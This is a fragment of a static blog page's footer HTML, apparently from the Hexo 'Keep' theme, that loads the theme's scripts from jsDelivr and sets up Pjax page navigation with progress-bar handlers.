    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/code-block.js"></script>




<div class="post-scripts pjax">
    
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/post-helper.js"></script>
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/libs/anime.min.js"></script>
        
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/toc.js"></script>
        
    
</div>


    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/libs/pjax.min.js"></script>
<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            KEEP.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            KEEP.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            KEEP.refresh();
        });
    });
</script>



</body>
</html>
